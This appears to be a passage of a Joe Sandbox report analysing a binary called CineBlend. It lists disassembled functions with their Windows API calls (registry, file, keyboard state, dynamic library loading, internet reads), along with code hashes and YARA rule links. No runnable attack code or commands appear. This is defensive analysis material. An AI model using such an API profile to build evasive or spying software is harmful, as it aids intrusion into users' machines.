Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 87367fd67f7cdc1c5a6da45cd549b6491c690f189902f614213bb904f7b567cb
Instruction ID: 59d1dc2d5689a0d90624813dcc098ea9de657c3a520c2263f5ad82b180ca44c4
Opcode Fuzzy Hash: 87367fd67f7cdc1c5a6da45cd549b6491c690f189902f614213bb904f7b567cb
Instruction Fuzzy Hash: 3EB15A72E04119ABDF15DBA4CC86EDEBBFDEF49710F1040E6FA09A7141EA309B448B61

Function 00BBADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00BBAE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BBAE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BBAEC8
CloseHandle.KERNEL32(?), ref: 00BBB09D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 07c45ca8c532e21f84f85d2e614e0be8a27b0ad13576af19bd7610ec85ca34fd
Instruction ID: f7d337eb52f55e8a4c5aaad2f7ab9e657e26398f4500558edb90b643905c03cb
Opcode Fuzzy Hash: 07c45ca8c532e21f84f85d2e614e0be8a27b0ad13576af19bd7610ec85ca34fd
Instruction Fuzzy Hash: 9BA182B1A047019FD720DF28C886F2AB7E5EF44710F54889DF5699B2D2DBB1EC418B81

Function 00B6BEA7 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BD46D0), ref: 00B6BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00C0221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B6BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00C02270,000000FF,?,0000003F,00000000,?), ref: 00B6BFB6
_free.LIBCMT ref: 00B6BEFF

Part of subcall function 00B62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?), ref: 00B62D4E
Part of subcall function 00B62D38: GetLastError.KERNEL32(?,?,00B6DB51,?,00000000,?,00000000,?,00B6DB78,?,00000007,?,?,00B6DF75,?,?), ref: 00B62D60

_free.LIBCMT ref: 00B6C0CB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 33a89f1647f7d6f0a8d8a84fd4a3aa16dfa714c8706abf6b7b955dedde252e86
Instruction ID: 940f75ecf1a6b2336a24cc0296cc65a32dd184c1226ee13c3638ee18898d22a5
Opcode Fuzzy Hash: 33a89f1647f7d6f0a8d8a84fd4a3aa16dfa714c8706abf6b7b955dedde252e86
Instruction Fuzzy Hash: 2451D371900209EFCB10EFA5DC85EAEB7F8EF41720B1002EAE554D71A1EB749E81CB50

Function 00BBC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00BBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BBC10E,?,?), ref: 00BBD415
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD451
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4C8
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BBC505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BBC560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BBC5C3
RegCloseKey.ADVAPI32(?,?), ref: 00BBC606
RegCloseKey.ADVAPI32(00000000), ref: 00BBC613

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 6d846bd912d9987b2bc9dc0e93e0e3860d4ae0f3d50841b3900a3b7f124b376b
Instruction ID: f630ff043ff5125020aee69b37ae3b70221045bf5385080b1d98a4287ef69b94
Opcode Fuzzy Hash: 6d846bd912d9987b2bc9dc0e93e0e3860d4ae0f3d50841b3900a3b7f124b376b
Instruction Fuzzy Hash: FA619171208241AFD714DF14C891E7ABBE5FF84308F5485ACF49A8B2A2DB71ED46CB91

Function 00B9ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B9D7CD,?), ref: 00B9E714

Part of subcall function 00B9E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B9D7CD,?), ref: 00B9E72D

Part of subcall function 00B9EAB0: GetFileAttributesW.KERNEL32(?,00B9D840), ref: 00B9EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00B9ED8A
MoveFileW.KERNEL32(?,?), ref: 00B9EDC3
_wcslen.LIBCMT ref: 00B9EF02
_wcslen.LIBCMT ref: 00B9EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B9EF67

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: ba0e6ca9de222bd2185bf5d79dc4db2ec47960acf5885f8a42397e53937a4d50
Instruction ID: e28d7b8f029545b041428e38db44153ab58a29dafffaaba3c786233917de1158
Opcode Fuzzy Hash: ba0e6ca9de222bd2185bf5d79dc4db2ec47960acf5885f8a42397e53937a4d50
Instruction Fuzzy Hash: 555141B24083859BCB24DB94D891ADBB3ECEF84311F50097EF69993151EF31E6888766

Function 00B99517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B99534
VariantClear.OLEAUT32 ref: 00B995A5
VariantClear.OLEAUT32 ref: 00B99604
VariantClear.OLEAUT32(?), ref: 00B99677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B996A2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: f28d4facaa873e14b76d61d11b25a0189686ba43c6990edd0fad02da3649f2a5
Instruction ID: 843caea938fe903f88da8ee4c1f8b8ba11901840ffa587c009c9f364a0894276
Opcode Fuzzy Hash: f28d4facaa873e14b76d61d11b25a0189686ba43c6990edd0fad02da3649f2a5
Instruction Fuzzy Hash: 415128B5A00619EFCB14CF68C884EAAB7F8FF89314B15856DE905DB314E730E911CB90

Function 00BA9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BA95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00BA961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BA9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BA969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BA96A4

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 229fb31c90b950d288d7e3521b874080a998d542e74d6605bcc59ce5e1d7da43
Instruction ID: d9e2228cde2aae916ace7d610b710faca6f024e7b751e89a829fd67bed8e7e5e
Opcode Fuzzy Hash: 229fb31c90b950d288d7e3521b874080a998d542e74d6605bcc59ce5e1d7da43
Instruction Fuzzy Hash: 48512A35A00619AFCB05DF65C881EAABBF5FF49314F148098F849AB362CB35ED41DB91

Function 00BB9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00BB999D
GetProcAddress.KERNEL32(00000000,?), ref: 00BB9A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00BB9A49
GetProcAddress.KERNEL32(00000000,?), ref: 00BB9A8F
FreeLibrary.KERNEL32(00000000), ref: 00BB9AAF

Part of subcall function 00B4F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00BA1A02,?,753CE610), ref: 00B4F9F1
Part of subcall function 00B4F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B90354,00000000,00000000,?,?,00BA1A02,?,753CE610,?,00B90354), ref: 00B4FA18

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 1ef7385b3174e6d09d52e462cee5d085f2447cf0edce256e42a16d8ba2bee417
Instruction ID: dc7aba0c103c0c54c3a56a14a1d298bde6d3c0562003e5b1066edf63c6dcd768
Opcode Fuzzy Hash: 1ef7385b3174e6d09d52e462cee5d085f2447cf0edce256e42a16d8ba2bee417
Instruction Fuzzy Hash: A3513735600605DFCB01DF68C485DA9BBF0FF09314B1981E8E95AAB362DB71ED86CB81

Function 00BC75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00BC766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00BC7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00BC76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00BAB5BE,00000000,00000000), ref: 00BC76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00BC76FF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 10b26d236c69298c08694a2bdf568a8ab628af2c4392b7e192db62cb122216cd
Instruction ID: c474a13ebdf4946cadf9e21023e41403a5f27b624131378ba9de33ec132da11d
Opcode Fuzzy Hash: 10b26d236c69298c08694a2bdf568a8ab628af2c4392b7e192db62cb122216cd
Instruction Fuzzy Hash: 6641C135A88504AFD725CF6CCC88FA97BE5EB0A350F1502B8F819A72E0DB70AD51DE50

Function 00B623C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B62433
_free.LIBCMT ref: 00B62453

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 49b8f1152b38d282e60481c791945f72f5caa1fc5308b52bb5af890d39e0835d
Instruction ID: c50e6e64c2b191be565f4a775bf0ee129fb27d8b2920584aeca6694427fbffd8
Opcode Fuzzy Hash: 49b8f1152b38d282e60481c791945f72f5caa1fc5308b52bb5af890d39e0835d
Instruction Fuzzy Hash: 5A41D232A00A109FEB20DF78C881A6DB3E6EF89314F1545E8EA15EB351DB35AD01CB81

Function 00B319CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B319E1
ScreenToClient.USER32(00000000,?), ref: 00B319FE
GetAsyncKeyState.USER32(00000001), ref: 00B31A23
GetAsyncKeyState.USER32(00000002), ref: 00B31A3D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 3a5a47275ea68a76aaaede7fdf4ee244c1e93f792022cc3a6264e6d2cafb83df
Instruction ID: f044c4942269c386b6d488cde58bd952f06895a982bc4ad3adf5d75582a6b015
Opcode Fuzzy Hash: 3a5a47275ea68a76aaaede7fdf4ee244c1e93f792022cc3a6264e6d2cafb83df
Instruction Fuzzy Hash: 55415D75A0410AFADF159F68C884BEEB7F4FB05725F20866AE439A2290C7306A54DB51

Function 00BA42B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00BA4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00BA4367
TranslateMessage.USER32(?), ref: 00BA4390
DispatchMessageW.USER32(?), ref: 00BA439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA43AB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: baa5b16a9a7414c2b076704f14f166d0c437440d3317998fa38bbe20d6462518
Instruction ID: 8c80fc03dd06b4b7a88281a7f4b31be685887143002ff1e6706160a5bb41716d
Opcode Fuzzy Hash: baa5b16a9a7414c2b076704f14f166d0c437440d3317998fa38bbe20d6462518
Instruction Fuzzy Hash: BD319370508345DEEF24CB74D84DFBA7BECEB96304F0445B9D462821A0EBF59849CB25

Function 00B9224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B92262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00B9230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00B92316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00B92327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B9232F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: ad7098fd9ec62bb66a9a10be3d67ad1cbc5d89db453474c2897fbe8ad6e63dca
Instruction ID: f21cbdc3cff68bf614cdbf4f7a77761d977df1a33446e041d9bfe45a2c5ac131
Opcode Fuzzy Hash: ad7098fd9ec62bb66a9a10be3d67ad1cbc5d89db453474c2897fbe8ad6e63dca
Instruction Fuzzy Hash: 6F31C075900219EFDF14CFA8CD89ADE3BB5EB08315F104279FA25A72D0C770A944DB90

Function 00BAD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00BACC63,00000000), ref: 00BAD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00BAD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00BACC63,00000000), ref: 00BAD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00BACC63,00000000), ref: 00BADA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00BACC63,00000000), ref: 00BADA37

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 6e762fbb154989d09584a89d327a31fc9e836bba0a4c9f3bf11368f186a6cfb7
Instruction ID: 2d8eedc1d16fe8303b07957d096405dccd9fc31f686a3bfd598ade9febd6e6b3
Opcode Fuzzy Hash: 6e762fbb154989d09584a89d327a31fc9e836bba0a4c9f3bf11368f186a6cfb7
Instruction Fuzzy Hash: 77314771608605EFDB20DFA5D884EAFBBF8EB05350B1084AEF546E3550EB30EE459B60

Function 00BC61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BC61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00BC623C
_wcslen.LIBCMT ref: 00BC624E
_wcslen.LIBCMT ref: 00BC6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BC62B5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 7486b97aa296afad3cd57318a0917c338a2aa8f5ce7de3ccbd94948f2678aea2
Instruction ID: c9fe94e6aabb4d79d179aab2557c1914eb2518e216fccce1f8a72606d4ec9c93
Opcode Fuzzy Hash: 7486b97aa296afad3cd57318a0917c338a2aa8f5ce7de3ccbd94948f2678aea2
Instruction Fuzzy Hash: 55217E759002589BDB219FA4CC84FEEBBF8EB44324F1042AEFA25EB180D7709985CF50

Function 00BB138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00BB13AE
GetForegroundWindow.USER32 ref: 00BB13C5
GetDC.USER32(00000000), ref: 00BB1401
GetPixel.GDI32(00000000,?,00000003), ref: 00BB140D
ReleaseDC.USER32(00000000,00000003), ref: 00BB1445

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: b7537a396c8fcc71154dd6abcdfc4c5f8c16794eb0eef437bc11763d7a3874d8
Instruction ID: 9793f4ef4e9f4a333926cd6660a521ded16235e0ecf7e814332c5d893dd99d35
Opcode Fuzzy Hash: b7537a396c8fcc71154dd6abcdfc4c5f8c16794eb0eef437bc11763d7a3874d8
Instruction Fuzzy Hash: 1E218E3AA00204AFD704EF69C894EAEBBF5EF49300B1484B9F85A97751DA70AC00CB90

Function 00B6D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B6D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6D169

Part of subcall function 00B63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B63BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B6D18F
_free.LIBCMT ref: 00B6D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B6D1B1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

